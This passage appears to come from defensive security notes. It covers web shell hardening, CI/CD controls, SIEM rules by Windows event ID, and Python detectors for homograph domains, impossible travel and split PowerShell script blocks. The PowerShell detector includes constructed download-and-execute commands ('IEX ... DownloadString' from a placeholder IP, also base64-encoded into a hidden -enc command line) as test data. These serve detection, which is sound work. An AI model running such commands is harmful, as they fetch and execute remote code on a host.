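if __name__ == "__main__":
    for name, hits in hunt_process_events(SAMPLE_PROCESS_EVENTS).items():
        print(f"{name}: {hits}")
```

The singleton list is deliberately unfiltered: on a real server it is long, and the value is in diffing it against yesterday's, not in reading it cold.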


Hardening servers against web shells

A single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences. With script-based malware, however, everything eventually funnels to a few natural chokepoints, such as cmd.exe, powershell.exe, and cscript.exe. As with most attack vectors, prevention is critical.

Organizations can harden systems against web shell attacks by taking these preventive steps:

  • Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.
  • Implement proper segmentation of your perimeter network, such that a compromised web server does not lead to the compromise of the enterprise network.
  • Enable antivirus protection on web servers. Turn on cloud-delivered protection to get the latest defenses against new and emerging threats. Users should only be able to upload files in directories that can be scanned by antivirus and configured to not allow server-side scripting or execution.
  • Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.
  • Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement, as well as other attack activities.
  • Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
  • Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges.

CI/CD Pipelines and Automation

Modern web applications are built with continuous integration and deployment processes. 

This means that you run tests specific to whatever environment you are pushing to, whether that is DEV, STAGING or PROD.

Control  Name                                          Priority  Difficulty
3.1      CI/CD Pipeline                                1         Medium
         Implement a CI/CD pipeline.
3.2      Application Environments                      2         Medium
         Create separate environments for dev, staging and prod, and treat each as independent with its own data, testing and requirements.
3.3      Application Data Separation                   3         Difficult
         Make sure that dev and test environments do not use the same data as production. If live data is required, make sure it is anonymized.
3.4      CI/CD Administration                          3         Medium
         Create and enforce user or team roles so that only the appropriate people can change or disable tests and deployment requirements.
3.5      Credential Store                              1         Medium
         Create a secure, encrypted place to store sensitive credentials such as passwords and API keys, and have the pipeline read from it rather than from source or job configuration.
3.6      Centralized Software Composition Analysis     1         Easy
         Scan source code for vulnerable libraries and open source components from within a pipeline stage.
3.7      Centralized Static Code Analysis              2         Easy
         Scan source code for vulnerabilities in the code itself from within a pipeline stage.
3.8      Centralized Sensitive Data Analysis           2         Easy
         Scan source code for secrets, credentials, API keys and similar from within a pipeline stage.
         Dynamic Application Security Testing (DAST)   3
         Scan the running application for vulnerabilities.

SIEM Rules from Event Log IDs and use cases

 Below is some guidance on rule creation and which events to look for:

Collection - Domain Controller - User Activity - Network Share Accessed
This rule looks for Windows Event ID 5140, which indicates that a network share was accessed. On workstations or domain controllers this event can be used to identify access to C$ or ADMIN$. Common false positives are IPC$, \SYSVOL and \NETLOGON.

Credential Access - AD - Account Lockout - Service Account
Event ID 4740. Service accounts should never lock out; a lockout means someone is guessing the password or a stale credential is still configured somewhere.

Defense Evasion - Domain Controller - System Change - Event Logs Cleared
Identifies the clearing of the event log on a Windows host or domain controller. This may be done to destroy evidence of malicious activity on a system.
Event ID 1102 (Security log cleared; 104 in the System log for the other logs)

Discovery - AD - Account Enumeration - Host
Event IDs 4771, 4625, 4768. Look for many distinct target accounts from one source in a short window; in 4768, Kerberos result code 0x6 (client principal unknown) is the signature of guessing usernames.

Discovery - AD - Kerberoasting
This rule looks for Active Directory activity indicative of Kerberoasting. Kerberoasting is where an attacker requests service tickets for SPN accounts and cracks them offline to recover the service account password and gain access to the targeted service.
Event ID 4769 (RC4 ticket encryption type 0x17, many distinct service names per requesting account)

Execution - Network - Access Attempt - Unicode Domain
Identifies web requests where the website domain contains Unicode characters. Internationalized domain names travel through DNS and URLs in punycode form, as labels prefixed "xn--"; Unicode allows the display of foreign characters in the URL bar and can be used to trick users into visiting lookalike (homograph) websites.
Match: hostname contains a label starting with "xn--" (regex (^|\.)xn--). Log source: web proxy server and firewalls.
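The Unicode-domain rule in code, as an added example that is not part of the original post: it matches "xn--" labels in proxy-log URLs, decodes them back to Unicode, and reports the labels that mix scripts (a Cyrillic letter dropped into Latin text), which is the cheap, high-confidence homograph signal. The lookalike hosts are constructed from Cyrillic code points at runtime so no punycode has to be typed by hand; the all-Cyrillic case is included to show the check's limit:

```python
import re
import unicodedata
from urllib.parse import urlsplit

XN_RE = re.compile(r"(?:^|\.)xn--", re.IGNORECASE)

# Constructed lookalikes. U+0430 is Cyrillic small a; U+0440, U+0456, U+0435 are Cyrillic
# er, i and ie. Python's idna codec produces the "xn--" form the proxy would log.
MIXED_SCRIPT_HOST = "\u0430pple.com".encode("idna").decode("ascii")   # Cyrillic а + Latin pple
ALL_CYRILLIC_HOST = "\u0430\u0440\u0440\u0456\u0435.com".encode("idna").decode("ascii")

# Constructed proxy log rows (made up): client, url, status
SAMPLE_PROXY_LOG = [
    ("10.0.0.5", "https://www.example.com/", 200),
    ("10.0.0.5", "https://" + MIXED_SCRIPT_HOST + "/account/login", 200),
    ("10.0.0.9", "http://" + ALL_CYRILLIC_HOST + "/", 200),
]


def host_of(url_or_host):
    """Lowercased hostname from a full URL or a bare host."""
    if "://" not in url_or_host:
        url_or_host = "http://" + url_or_host
    return (urlsplit(url_or_host).hostname or "").lower()


def decode_idna_host(host):
    """Turn xn-- labels back into Unicode; ASCII labels pass through unchanged."""
    out = []
    for label in host.split("."):
        if label.startswith("xn--"):
            out.append(label[4:].encode("ascii").decode("punycode"))
        else:
            out.append(label)
    return ".".join(out)


def scripts_in(label):
    """Unicode scripts of the letters in a label, read from the character names
    ('CYRILLIC SMALL LETTER A' -> 'CYRILLIC')."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}


def assess_url(url_or_host):
    """None for plain ASCII hosts; otherwise the decoded host and the labels that mix
    scripts. An all-Cyrillic lookalike passes this test and needs a confusables table."""
    host = host_of(url_or_host)
    if not XN_RE.search(host):
        return None
    decoded = decode_idna_host(host)
    mixed = [label for label in decoded.split(".") if len(scripts_in(label)) > 1]
    return {"host": host, "decoded_host": decoded, "mixed_script_labels": mixed}


def scan_proxy_log(rows):
    hits = []
    for client, url, status in rows:
        verdict = assess_url(url)
        if verdict:
            hits.append({"client": client, **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{hit['client']} -> {hit['host']} = {hit['decoded_host']!r} mixed={hit['mixed_script_labels']}")
```

Alerting on every xn-- host is noisy in any organization with non-English users; alerting on mixed-script labels, or on a decoded host whose confusable skeleton equals one of your own brands, is what keeps the rule usable.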
Exfiltration - Email - Auto Forwarding
This rule looks for many emails from a single internal user going to one external address, indicative of a user (or an attacker holding their mailbox) forwarding mail content to a personal mailbox.
Vendor message id is: send, and status is: originating (field names are vendor-specific)

Initial Access - ADFS - Excessive Login Failures
Identifies a large volume of AD FS failures, which may indicate account enumeration, brute-force login activity or a client misconfiguration.
Event IDs 1201, 1203, 1205

Initial Access - Remote Access - Login Attempt - Different Geos
Identifies VPN logins by the same user from geographically distant locations in a short time period, i.e. at an implied speed no traveller could achieve. This may indicate account compromise, especially if the user is not travelling. Check the VPN egress and geo-IP data before escalating: a user on a mobile carrier or behind a corporate proxy can appear to move between cities in minutes.
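The different-geos rule as a calculation, as an added example that is not part of the original post: consecutive logins per user, great-circle distance between them, and an alert when the implied speed exceeds what an airliner manages. The login records are constructed and assume geo-IP enrichment has already supplied latitude and longitude; the 900 km/h ceiling and the 100 km jitter floor are assumptions:

```python
import math
from collections import defaultdict
from datetime import datetime

# Constructed VPN login records with geo-IP already resolved (made up for this example).
SAMPLE_LOGINS = [
    {"user": "jdoe", "time": "2024-05-01T09:00:00", "ip": "198.51.100.7",
     "city": "New York", "lat": 40.7128, "lon": -74.0060},
    {"user": "jdoe", "time": "2024-05-01T10:00:00", "ip": "203.0.113.9",
     "city": "Moscow", "lat": 55.7558, "lon": 37.6173},
    {"user": "abrown", "time": "2024-05-01T09:00:00", "ip": "192.0.2.44",
     "city": "London", "lat": 51.5074, "lon": -0.1278},
    {"user": "abrown", "time": "2024-05-01T11:00:00", "ip": "192.0.2.45",
     "city": "Paris", "lat": 48.8566, "lon": 2.3522},
    {"user": "abrown", "time": "2024-05-01T11:00:30", "ip": "192.0.2.45",
     "city": "Paris", "lat": 48.8566, "lon": 2.3522},
]

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points given in degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def impossible_travel(logins, max_kmh=900.0, min_km=100.0):
    """Compare each user's consecutive logins and alert when the implied speed beats an
    airliner. min_km suppresses geo-IP jitter between nearby points of presence."""
    by_user = defaultdict(list)
    for rec in logins:
        by_user[rec["user"]].append(rec)
    alerts = []
    for user, recs in by_user.items():
        recs.sort(key=lambda r: r["time"])
        for a, b in zip(recs, recs[1:]):
            km = haversine_km(a["lat"], a["lon"], b["lat"], b["lon"])
            if km < min_km:
                continue
            seconds = (datetime.fromisoformat(b["time"]) - datetime.fromisoformat(a["time"])).total_seconds()
            # two continents inside the same second: speed is unbounded, still an alert
            speed = km / (seconds / 3600) if seconds > 0 else math.inf
            if speed > max_kmh:
                alerts.append({"user": user, "from": a["city"], "to": b["city"],
                               "from_ip": a["ip"], "to_ip": b["ip"],
                               "km": round(km), "hours": round(seconds / 3600, 2),
                               "kmh": None if speed == math.inf else round(speed)})
    return alerts


if __name__ == "__main__":
    for alert in impossible_travel(SAMPLE_LOGINS):
        print(alert)
```

Feed it the VPN concentrator's authentication log with the source IP resolved through your geo-IP database; keep a per-user allow-list of known travel and known proxy egress ranges, because those two sources account for most of the alerts this rule raises.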

Lateral Movement - Domain Controller - Login Attempt - Interactive
Identifies a remote interactive login to a domain controller.
Event ID 4624 with Logon Type 10 (RemoteInteractive, RDP) or 2 (Interactive, console)

Persistence - Domain Controller - System Change - Audit Policy Changed
Identifies system audit policy changes on Windows hosts. This represents a change to the type of security events logged by the system and may be a pre-attack step to avoid detection.
Event IDs 4719, 4905, 4912

Persistence - Domain Controller - System Change - Domain Policy Changed
Event ID 4739

Persistence - Domain Controller - System Change - Multiple Processes Created
Identifies a large number of processes being created in a short time on a monitored Windows host. An abnormal volume of unusual processes may indicate the host has been compromised or is being misused.
Event ID 4688, 10 or more distinct process names within the window

Persistence - Domain Controller - System Change - Scheduled Task
Identifies the creation of new scheduled tasks as well as changes to existing tasks. Creating new scheduled tasks or removing existing ones may be a technique to maintain persistence.
Event IDs 4698, 4699, 4700, 4701, 4702

Persistence - Domain Controller - System Change - Service Installed
Identifies the installation of unexpected services on a system. Unexpected services may be an indicator of system compromise or misuse.
Event IDs 7045 (System log), 4697 (Security log), 601 (pre-Vista)

Privilege Escalation - AD - Group Change - Admin
Identifies changes to a user's group membership in AD. The high risk associated with delegating certain permissions in AD warrants a high level of scrutiny, for example the promotion of a domain user to Domain Admins.
Event IDs 4728, 4732, 4746, 4751, 4756, 4761

Privilege Escalation - ATP - Golden Ticket
This rule looks for Golden Ticket related activity identified by Azure ATP. See the Microsoft suspicious activity guide for details: https://docs.microsoft.com/en-us/azure-advanced-threat-protection/suspicious-activity-guide?tabs=external
Event IDs 2009, 2013, 2027, 2032, 2022

Hunting Fileless Malware and PowerShell Activity:
Event IDs 4104, 4103 and 4688
  • Event ID 4103 - Module Logging - records pipeline execution details: the commands that ran, the parameters they were given and the values of self-defined variables, so obfuscated invocations are captured after variable expansion. It has to be enabled through policy (Turn on Module Logging) before it records anything.
  • Event ID 4104 - Script Block Logging - captures the content of each script block as PowerShell executes it, on the local host and for commands arriving through PowerShell remoting. Because it logs what is executed rather than what was typed, obfuscated scripts appear decoded, which gives visibility a command-line record cannot.
  • If a script block exceeds the maximum event message size, script block logging splits it into multiple 4104 events that share a ScriptBlockId and must be reassembled in MessageNumber order. PowerShell also writes blocks matching its built-in suspicious-keyword list at the Warning level even when script block logging is otherwise turned off, so Warning-level 4104 events are worth an alert on their own.
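The two practical details in the last bullet in code, as an added example that is not part of the original post: reassembling split 4104 events by ScriptBlockId and MessageNumber (including a block whose later fragments never arrived), scanning the joined text for the usual download-and-execute tokens, and decoding the -EncodedCommand blob from a 4688 command line, which is base64 over UTF-16LE rather than UTF-8. The events, the indicator list and the command line are constructed; the base64 payload is generated in the block so it is a genuine encoding:

```python
import base64
import re
from collections import defaultdict

# Constructed Event ID 4104 records (made up). A block that exceeds the event size limit is
# logged as several events sharing ScriptBlockId, numbered MessageNumber of MessageTotal.
SAMPLE_4104 = [
    {"ScriptBlockId": "4f6c1d2e-aaaa-4bbb-8ccc-000000000001", "MessageNumber": 2, "MessageTotal": 2,
     "Level": "Warning", "ScriptBlockText": "loadString('http://198.51.100.7/a.ps1'); IEX $s"},
    {"ScriptBlockId": "4f6c1d2e-aaaa-4bbb-8ccc-000000000001", "MessageNumber": 1, "MessageTotal": 2,
     "Level": "Warning", "ScriptBlockText": "$c = New-Object Net.WebClient; $s = $c.Down"},
    {"ScriptBlockId": "4f6c1d2e-aaaa-4bbb-8ccc-000000000002", "MessageNumber": 1, "MessageTotal": 1,
     "Level": "Verbose", "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"ScriptBlockId": "4f6c1d2e-aaaa-4bbb-8ccc-000000000003", "MessageNumber": 1, "MessageTotal": 3,
     "Level": "Verbose", "ScriptBlockText": "function Invoke-Stage { param($u) "},  # fragments 2 and 3 lost
]

INDICATORS = ["-EncodedCommand", "FromBase64String", "Invoke-Expression", "IEX", "DownloadString",
              "Net.WebClient", "Add-Type", "VirtualAlloc", "-nop", "-w hidden"]


def reassemble_script_blocks(events):
    """Join fragments per ScriptBlockId in MessageNumber order; report gaps instead of
    silently producing a truncated script."""
    parts = defaultdict(dict)
    totals, levels = {}, defaultdict(set)
    for ev in events:
        sid = ev["ScriptBlockId"]
        parts[sid][ev["MessageNumber"]] = ev["ScriptBlockText"]
        totals[sid] = ev["MessageTotal"]
        levels[sid].add(ev["Level"])
    blocks = {}
    for sid, chunks in parts.items():
        text = "".join(chunks[i] for i in sorted(chunks))  # fragments arrive in any order
        blocks[sid] = {"text": text, "complete": len(chunks) == totals[sid],
                       "levels": levels[sid],
                       "missing": sorted(set(range(1, totals[sid] + 1)) - set(chunks))}
    return blocks


def suspicious_indicators(text):
    low = text.lower()
    return [ind for ind in INDICATORS if ind.lower() in low]


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENC_RE = re.compile(rf"-(?:{_ENC_PREFIXES})\s+([A-Za-z0-9+/=]{{16,}})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; decoding it as UTF-8 gives text
    with a NUL after every character. Returns None when there is no such switch."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed 4688 command line; the blob is generated here so it is a real -enc payload.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii"))


if __name__ == "__main__":
    for sid, block in reassemble_script_blocks(SAMPLE_4104).items():
        print(sid, "complete" if block["complete"] else f"missing {block['missing']}",
              suspicious_indicators(block["text"]))
    print("decoded:", decode_encoded_command(SAMPLE_CMDLINE))
```

Match the indicators against the reassembled text, not the individual events: in the sample, "DownloadString" is split across the fragment boundary and neither fragment alone contains it.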
USE CASE: DNS QUERY
Objective: The mission of this hunt is to drill down into DNS logs to baseline the common domains queried by endpoints in the environment, and to identify potentially infected endpoints by looking for possible DNS tunneling, domain generation algorithm (DGA) domains and traffic to risky top-level domains (TLDs).
Log Source & Requirements: DNS query logging
Duration: 30 Days

Linux Compromises & Access Tools and Where to Find Them

 Linux compromises 

  • Linux systems are 'occasionally' targeted by actors, especially cryptomining and ransomware crews.
  • The process is similar to a Windows machine compromise, but some areas are specific to each flavour.
  • Below is a brief overview of the exploitation, protection, detection and remediation processes for Linux operating systems.

    Exploitation (same process as Windows devices):
    • Exploit an external-facing service
    • Establish persistence
    • Collect credentials
    • Move laterally

    Protection (similar to Windows):
    • Patch, including applications
    • Cron job with apt / yum update
    • Limit the number of admins with sudo powers
    • Application whitelisting (fapolicyd)
    • ACSC also has a Linux hardening worksheet which could be useful (Hardening Linux Workstations and Servers)

    Detection, utilising logs:
    • Web logs: exploitation attempts, web shells
    • Command-line logging
    • SSH logs
    • Memory images (which I don't think are a viable way for continuous detection; more likely for incident response)
    • Use YARA rules to search for malware; Volatility plugin


Process data:

    • ps -eaf
    • pstree


Get service (cron) data:

    • ls -la /etc/cron*
    • Cron jobs redirecting output to "> /dev/null" are worth checking out

Remediation:

    • Change passwords
    • Regenerate keys (e.g. SSH)
    • Remove added users
    • Clean off malware (web shells, scripts, implants)
    • Remove cron jobs
    • Monitor for reconnection attempts (from known malicious IPs)


Fantastic Access Tools
    • Attackers are increasingly using remote access tools to gain and maintain access to the network, either by:
    • Abusing tools already deployed (and obtaining credentials for them)
    • Deploying their own software

Generic detection to help find these tools in your org
    • Event 4688 - process names
    • Event 4697 - service creation event (if the tool was installed as a service)
    • Sysmon - process names, DNS lookups / network traffic to known remote-management-tool domains
    • Firewall logs - connections classified by application
    • Can also manually check a host using:
    • wmic /node:<target> process list


Tool brief overviews
  • Recent report: Anomali, 'ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs'
    • DameWare
    • Requires an incoming connection from the internet on various ports
    • Connects to the IPv6 local host
    • Shodan.io - product:dameware
    • Dwrcs.exe
    • GoToAssist
    • Generates outgoing HTTP/S traffic - look for logmein or gotoassist
    • Gotoassist.exe
    • ConnectWise Control / ScreenConnect
    • Generates outgoing HTTP/S traffic
    • Screenconnect.clientservice.exe
    • Commonly used in phishing emails with a URL that deploys ScreenConnect directly
    • Keep an eye out for any remote management/access tools
    • Most of them will probably be "legit". If they are, ensure they:
    • Use MFA
    • Have logging turned on
    • Have their users managed
    • Are shut down when not in use

  • SDBBot is a remote access trojan identified by Proofpoint in 2019. The ACSC issued an alert in November last year about increased sightings in attacks targeting healthcare. It is often used to drop ransomware.
  • Initial infection is usually via ISO or Excel email attachments. It sends C&C traffic over port 443 in a plaintext (non-TLS) protocol, so an egress rule that allows only TLS on 443 breaks it.

    Mitigations:
    • Microsoft's Attack Surface Reduction rules
    • Block ISO attachments and downloads 
    • Block non-HTTPS traffic over port 443

'Lo-Tech OT hacking'
  • A general primer on finding and securing 'human-machine interfaces', or HMIs, i.e. dashboards for SCADA/OT equipment.
  • Commonly exposed HMIs include HVAC, fridges, etc. 
  • Cool Shodan search: https://www.shodan.io/search?query=screenshot.label%3Aics
  • HMIs are easy to find and access. Targeted industrial sabotage is unlikely; most hackers are bored and poking at low-hanging fruit. 
  • This maps to OTORIO's report about the Israeli reservoir 'hack' in December. They concluded that the attackers likely 'did not possess any deep industrial capabilities or knowledge' and targeted the system solely because it was unprotected. 
  • Note: we called attacks on these devices 'annoying' but 'unlikely to be dangerous'. An attendee pointed out that a hacked fridge could be catastrophic for a hospital or pharmacy storing temperature-controlled medications.

  • Recommendation: network scanning and searching Shodan for Modbus and DNP3, plus other common HMI ports and protocols. 
Teamviewer and remote access security
  • In light of the Florida water incident, they added some points about securing remote access/support tools. Nothing too exciting, just 'figure out what tools are in use at your organization' and 'maybe try to secure them?' 
  • Apparently there will be a more detailed brief on this incident later.
